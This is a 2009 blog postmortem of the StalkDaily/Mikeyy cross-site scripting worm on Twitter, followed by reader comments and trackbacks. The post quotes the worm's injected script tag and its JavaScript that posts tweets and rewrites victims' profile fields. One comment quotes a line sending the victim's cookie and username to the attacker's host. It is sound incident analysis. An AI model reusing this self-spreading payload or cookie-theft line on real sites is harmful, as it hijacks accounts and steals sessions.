Twitter StalkDaily Worm Postmortem

Twitter got hit with a little security incident this afternoon we’ll call the “StalkDaily Worm”. I have no clue if the StalkDaily site was actually associated with the worm at this point or if it was simply a misdirection. I believe it to be the latter.

At around 3:43pm PST this afternoon I noticed some odd updates from a couple of my friends regarding the StalkDaily site. I then saw this tweet from @JoeCascio:

First virus-like hack of Twitter is StalkDaily.com. Looks like a code injection in the Location field of your profile.

Coming from Joe, I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily site, but then also some script tags. These typically aren’t allowed as part of a profile URL and looked suspicious:

<a href="http://www.stalkdaily.com"/><script src="hxxp://mikeyylolz.uuuq.com/x.js>"

That part in red is particularly bad and is what was getting injected into people’s profiles. Taking a quick look at the JavaScript that it actually links to, there were a few lines in particular that caught my eye:

var update = urlencode("Hey everyone, join www.StalkDaily.com. It's a site like Twitter but with pictures, videos, and so much more! :) ");
var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');

var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+update+"&tab=home&update=update");
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");

What’s happening here is that it looks like somebody realized they could save url encoded data to the profile URL field that would not be properly escaped when re-displayed. This is particularly nasty because you could get infected simply by viewing somebody’s profile page on Twitter that was already infected. If you visited an infected profile, the JavaScript in the profile would execute and by doing so tweet the mis-leading link, and update your profile with the same malicious JavaScript thereby infecting anybody that then visits your profile on twitter.com.

This was a nasty little script.

This is also one of the reasons that I browse the web with NoScript. It’s a hassle, sure, but it prevented the script from an untrusted domain (uuuq.com) from running on Twitter.com.

As we’ve seen with worms in the past, this attack was loud and noisy and all the attackers did was collect your Twitter username and cookie. Had they been playing for real, a more profitable approach would have been to leave your profile URL intact and insert some JavaScript that turned your browser into an endpoint on a bot network. </doomandgloom>

It looks like Twitter has already taken care of the issue for the most part. Thanks to @al3x and crew for their near-instant response on what was likely a nice relaxing Saturday afternoon.

If you have the stalkdaily URL in your profile, you were likely attacked by this issue. Twitter has taken care of it at this point, so feel free to correct your URL and continue with your Saturday evening Twittering. There’s some more information on this post.

Be safe out there – the Internet is a dangerous place. :)

Update (2009-04-12): A brief update – another round of the worm hit Twitter on Sunday morning. It was effectively the same thing, but attacked a different field. The code, oddly enough, had also been run through an obfuscator. You can see the partially obfuscated code from the second worm here: second version of worm.

Continue reading » · Written on: 04-11-09 · 54 Comments »

54 Responses to “Twitter StalkDaily Worm Postmortem”

  1. Joe Cascio wrote:

    Hey Damon,
    I was hoping you’d get to the bottom of this exploit and write it up. Thanks!! And as you say… “Let’s be careful out there!”

    April 11th, 2009 at 5:34 pm
  2. Ed wrote:

    Thinking team twitter did well.

    I’d like to see the deer ticks that
    launched this exploit doing the backstroke off Somalia

    April 11th, 2009 at 7:01 pm
  3. Pierre Fontenelle wrote:

    Good stuff, I’ve been posting that notice of the code being web address related on a number of blogs and tweets.

    I think it’s a shame stalkdaily.com automatically gets the blame for this thing when the worm could’ve easily “promoted” myspace, facebook, your blog, or any other website of choosing.

    April 11th, 2009 at 7:17 pm
  4. Rob Nelson (guruvan) wrote:

    @a3lx and crew did well shutting down the worm

    Whoever was “in charge” of informing the tweeple Was nowhere to be found. There’s no excuse for twitter having failed to post a notice to status.twitter.com about this incident. It should have been posted immediately, with any details and corrective measures that twitter was taking and that users should have taken. It shold have been updated as soon as the situation progressed.

    But it’s no surprise. Twitter doesn’t really care about its users. A few great people inside twitter (like @a3lx) do care, but that doesn’t help the users to know anything. The users of twitter are left in the dark hunting for answers.

    In fact, as I write this, I am still inundated with user questions about what happened, how to know if they are infected, and what to do if they are.

    I said it on Mashable’s page, and I’ll say it here: It was TOTALLY IRRESPONSIBLE of Twitter to leave their users in the dark.

    April 11th, 2009 at 7:26 pm
  5. Damon wrote:

    Rob,

    I agree Twitter does need a more effective means of notifying their users in situations like this. While perhaps abusive of the mentions functionality, I @’ed some Twitter team members a couple times as I wasn’t sure if they were aware of it or not.

    Of course as I write this @twitter makes an update. ;)

    http://status.twitter.com/post/95332007

    April 11th, 2009 at 7:34 pm
  6. Rob Nelson (guruvan) wrote:

    Damon,

    In an incident like this, I think that your use of the @mention facility it exactly correct. I dont’ have a lot of the team members names, but I sure @ ‘ed #ev and #biz a few times (and at least @netik)

    And how can you be sure if they’re aware unless someone updates the status page? Just a simple mention cuts the volume down considerably. (I do speak from first hand experience of running a TechOps department of a very public new technology site)

    April 11th, 2009 at 8:48 pm
  7. Lee wrote:

    It looks like a 17 year old boy has admitted to being behind the worm : http://www.bnonews.com/news/242.html

    April 12th, 2009 at 1:03 am
  8. Latest Antivirus Updates » Twitter worm outbreak over Easter wrote:

    [...] More info on the technical internals of the attack are available at dcortesi.com. [...]

    April 12th, 2009 at 1:55 am
  9. David Jackmanson wrote:

    Thanks for the tech info. It appears that stalkdaily.com is hosted by Dreamhost and uuuq.com is hosted by GoDaddy. I’ve contacted them both asking them to remove “Mikeyy”’s accounts:

    http://letstakeover.blogspot.com/2009/04/fight-back-against-stalkdaily-and-its.html

    April 12th, 2009 at 4:10 am
  10. Twitter Worm Causes Uncontrolled Tweeting | WCZone Web Design! | Akron Ohio Website Design - Akron Web Development, Cleveland Web Design, Business Website,Web Programming, Akron, Summit County - Services Cuyahoga Falls Website Design Web Development, Busi wrote:

    [...] technical detail on the attack is available at dcortesi.com. Twitter is reporting that they have already taken care of the problem, but still it’s probably a [...]

    April 12th, 2009 at 5:10 am
  11. Brandon Paddock wrote:

    Did IE8’s XSS Filter help protect against this?

    April 12th, 2009 at 7:09 am
  12. Technology News » Twitter worm “StalkDaily” launched, spread, defeated wrote:

    [...] a technical explanation of what was going on, I refer you to Damon Cortesi’s Twitter StalkDaily Worm Postmortem. An easy way to check to see if you’ve been infected is to search twitter for “{your [...]

    April 12th, 2009 at 7:35 am
  13. Twitter Vulnerability: Mutating Fast and More on the Way | Spin Valley Post wrote:

    [...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]

    April 12th, 2009 at 9:29 am
  14. We Love Crowds » Twitter Vulnerability: Mutating Fast and More on the Way wrote:

    [...] left a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]

    April 12th, 2009 at 9:48 am
  15. Twitter Vulnerability: Mutating Fast and More on the Way | thekevinpipe.com wrote:

    [...] left a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]

    April 12th, 2009 at 9:48 am
  16. Technic News » Twitter Vulnerability: Mutating Fast and More on the Way wrote:

    [...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]

    April 12th, 2009 at 9:58 am
  17. Ingrid Alongi wrote:

    Awesome write-up!

    April 12th, 2009 at 10:32 am
  18. DCortesi . blog » Twitter StalkDaily Worm Postmortem | My Maine wrote:

    [...] You can read the full story here. Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages. [...]

    April 12th, 2009 at 10:38 am
  19. Twitter Vulnerability: Mutating Fast and More on the Way | Programming Blog wrote:

    [...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]

    April 12th, 2009 at 11:02 am
  20. Awakened by Mikeyy. Little punk. « Work That Web wrote:

    [...] http://dcortesi.com/2009/04/11/twitter-stalkdaily-worm-postmortem/ [...]

    April 12th, 2009 at 1:17 pm
  21. UnderForge of Lack » Blog Archive » Twitter cultivate worm and they spread over Easter wrote:

    [...] Python – Spam 相変わらずのJavaScriptを使ったクロスサイト誘導: Twitter StalkDaily Worm Postmortem script src=”hxxp://mikeyylolz.uuuq.com/x.js 212.95.49.251 NETDIRECT-NET-DEDISERV (Poland ) [...]

    April 12th, 2009 at 2:45 pm
  22. Twitter Vulnerability: Mutating Fast and More on the Way | New Web 2.0 Magazine wrote:

    [...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi blog. Clearly Mikeyy is still bored as the new version is now making its way across the [...]

    April 12th, 2009 at 3:03 pm
  23. Interesting Information Security Bits for 04/12/2009 | Infosec Ramblings wrote:

    [...] has a nice description of one of the worms that hit Twitter this weekend. DCortesi . blog >> Twitter StalkDaily Worm Postmortem Tags: ( twitter worm [...]

    April 12th, 2009 at 4:29 pm
  24. 脆弱的 Twitter:病毒变种泛滥 - 读写网唯一官方中文站 - 搜狐IT独立群体博客 wrote:

    [...] GitHub 上查看,有关昨天受到攻击的漏洞的“尸检”,请查看 DCortesi [...]

    April 12th, 2009 at 7:17 pm
  25. StalkDaily worm hits Twitter « kpowerinfinity wrote:

    [...] Comment! Found a full post mortem of the latest worm to hit the Social Media scene – StalkDaily. Very interestingly, twitter allowed to add script tags in their profile, and 17-year old Mickeyy Mooney employed a cross-site scripting attack to not just post an update promoting his own site StalkDaily.com, but also added the same malicious javascript on the profile pages of who-ever visited an infected page. The modus operandi of the attack is described in more detail here. [...]

    April 12th, 2009 at 7:23 pm
  26. 脆弱的 Twitter:病毒变种泛滥 « 每日IT新闻,最新IT资讯,聚合多站点消息,保证你与世界同步 wrote:

    [...] GitHub 上查看,有关昨天受到攻击的漏洞的“尸检”,请查看 DCortesi [...]

    April 12th, 2009 at 7:59 pm
  27. ArticleSave :: Uncategorized :: Twitter Vulnerability: Mutating Fast and More on the Way wrote:

    [...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]

    April 12th, 2009 at 10:06 pm
  28. Twitter Worm - flyingpenguin wrote:

    [...] has posted a nice summary of a script exploit in Twitter I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily [...]

    April 12th, 2009 at 10:25 pm
  29. Twitter Vulnerability: Mutating Fast and More on the Way | google android os blog wrote:

    [...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]

    April 13th, 2009 at 12:17 am
  30. hackademix.net » Mikeyy's StalkDaily Twitter Worm vs NoScript wrote:

    [...] StalkDaily.com. A good technical description of its rather simple inner workings has been kindly provided by Damon Cortesi. As you can see, unless the mikeyylolz.uuuq.com doman is allowed to run JavaScript (very unlikely [...]

    April 13th, 2009 at 3:27 am
  31. Tech Sassy » Blog Archive » Security Alert: Twitter exploited by “Mikeyy” worm over weekend wrote:

    [...] an analysis of the script that it uses, check out DCortesi’s excellent blog post. Excerpt below: … it looks like somebody realized they could save url encoded data to the [...]

    April 13th, 2009 at 4:07 am
  32. Frank wrote:

    Why does the worm code send the cookie and username back to his site with:
    http://mikeyylolz.uuuq.com/x.php?c=” + cookie + “&username=” + username

    when it can update the profile and the notices using XHConn()?

    is that just to prove a point?

    April 13th, 2009 at 6:35 am
  33. dmangstar564 wrote:

    Ill be one to say it, thank god this was written by a script kiddie and not someone who actually had malicious intentions.

    April 13th, 2009 at 7:01 am
  34. Damon wrote:

    Frank,

    Maybe the worm author wanted a) a record of who had been compromised and b) the potential to re-inject or compromise those accounts again if the profile code got removed?

    Or c) because he was bored and that’s what all the other worms do.

    b) is interesting because say somebody with a large number of followers gets infected. They will be notified quickly and fix their profile, but imagine how frustrating it would be if their cookie was still valid and a simple cron job kept updating it. ;)

    April 13th, 2009 at 9:01 am
  35. Pages tagged "blog" wrote:

    [...] bookmarks tagged blog DCortesi . blog » Twitter StalkDaily Worm Postmor… saved by 3 others     gli0444 bookmarked on 04/13/09 | [...]

    April 13th, 2009 at 10:48 am
  36. WarGame’s Blog » Blog Archive » Yet an other XSS worm wrote:

    [...] seems that a XSS worm is spreading among twitter users … here more [...]

    April 13th, 2009 at 12:12 pm
  37. “Lost in the Noise” - Security Research Weblog » Blog Archive » Twitter getroffen door wormaanval wrote:

    [...] alle betrokkenheid bij de aanval en zegt zelf het slachtoffer van hackers te zijn geweest. Verdere analyse van aanval wijst uit dat de aanvallers erin geslaagd waren om script van een andere website op [...]

    April 14th, 2009 at 12:32 am
  38. Jonathan Wagener wrote:

    @Ed, but you guys are supposed to make it impossible for the guy to exploit you. I wouldve thought this a simple thing to handle. You dont think that a hacker with such a great exploit is just going to let it go by without using it :)

    great write up by the way.

    April 14th, 2009 at 2:41 am
  39. stalkdaily.com wrote:

    [...] Worm [4] Twitter worm “StalkDaily” launched, spread, defeated | ITworld [5] DCortesi . blog ” Twitter StalkDaily Worm Postmortem [6] Techmeme: Update on StalkDaily.com Worm (Twitter [...]

    April 14th, 2009 at 4:26 am
  40. Twitter worm outbreak over Easter - All About Virus wrote:

    [...] M&#111&#114e inf&#111 &#111n t&#104e tec&#104nical inte&#114nals &#111f t&#104e attack a&#114e availa&#98le at dc&#111rtesi.c&#111m. [...]

    April 14th, 2009 at 5:40 pm
  41. Twitter Vulnerability: Mutating Fast and More on the Way - Indometric wrote:

    [...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]

    April 18th, 2009 at 9:00 pm
  42. Explanation of How My Twitter Account Was Hacked | Sue Waters Blog wrote:

    [...] fought off four waves of worm attacks created by Mikeyy Mooney.  Damon Cortesi wrote an excellent postmortem post that explains exactly how the worm worked and what code was [...]

    April 19th, 2009 at 7:45 am
  43. Twitter: Under attack | IT Security | TechRepublic.com wrote:

    [...] also become infected just by looking at an compromised Twitter profile page. For those so inclined, Damon Cortesi has posted a blog that takes an in-depth look at the worm [...]

    April 21st, 2009 at 2:45 am
  44. The Ashes » Blog Archive » Twitter: StalkDaily/Mikeyy worm wrote:

    [...] also become infected just by looking at a compromised Twitter profile page. For those so inclined, Damon Cortesi has posted a blog that takes an in-depth look at how the worm [...]

    April 25th, 2009 at 12:48 pm
  45. Jake Kasprzak Online › The Twitter XSS Worm and Lessons That Can Be Learned From It wrote:

    [...] This worm infected the profiles of Twitter users so that they contained malicious code. Logged-in Twitter users who would view one of these infected profiles would then, through execution of the JavaScript injected into these profiles via an XSS hole, have their own profiles infected with the same code. Therefore, propagation of this worm occurred via logged-in Twitter users simply viewing infected profiles. The source code used by this worm can be viewed here. As one can see by viewing this source code that is called from infected Twitter pages, it injects the malicious script and other data that would appear in profiles when they are infected with this worm. Damon Cortesi gives a good analysis of the worm here. [...]

    April 27th, 2009 at 3:50 pm
  46. Security Justice » Blog Archive » Security Justice - Episode 12 wrote:

    [...] Twitter StalkDaily Worm Postmortem [...]

    May 3rd, 2009 at 6:24 pm
  47. Web API a bezpečnosť wrote:

    [...] Mikeyy worm17 ročný mladík, Michael Mooney, sa preslávil za niekoľko hodín vytvorením červa, ktorý zneužíval zlú filtráciu prichádzajúcich správ. [...]

    June 16th, 2009 at 8:35 am
  48. 5 XSS Exploits You Should Know About (& how to prevent them) | Deadly Technology wrote:

    [...] and executed consistently. An excellent example of stored cross site scripting is the recent Mikeyy Stalk Daily worm attack on Twitter.  Mikeyy’s code was stored in the profile data for twitter users and was subsequenty [...]

    June 19th, 2009 at 7:35 am
  49. SChalice wrote:

    “Thinking team twitter did well.”

    Thinking they are foolish.

    July 22nd, 2009 at 12:41 pm
  50. Twitter: Under attack | tempebasah media wrote:

    [...] also become infected just by looking at a compromised Twitter profile page. For those so inclined, Damon Cortesi has posted a blog that takes an in-depth look at how the worm [...]

    August 7th, 2009 at 12:33 am
  51. Week 3 « Week3 Enterprise 2.0 wrote:

    [...]  An additional interesting blog is about about Twitter black-out that happened couple of days ago, the user explains in detail what really happened to Twitter becoming unavailable.http://dcortesi.com/2009/04/11/twitter-stalkdaily-worm-postmortem/ [...]

    August 11th, 2009 at 11:34 pm
  52. はまち on Twitter « 情報セキュリティ備忘録 wrote:

    [...] on Twitter 中身はこの辺やこの辺に。 みんな楽しそうに見えるのですが… [...]

    September 24th, 2009 at 8:57 pm
  53. Explanation of How My Twitter Account Was Hacked | The Aggregator wrote:

    [...] fought off four waves of worm attacks created by Mikeyy Mooney.  Damon Cortesi wrote an excellent postmortem post that explains exactly how the worm worked and what code was [...]

    October 8th, 2009 at 3:43 am
  54. Twitter Worm Outbreak Over Easter – Security Threat Research News wrote:

    [...] More info on the technical internals of the attack are available at dcortesi.com. [...]

    December 12th, 2009 at 4:11 am

Leave a Reply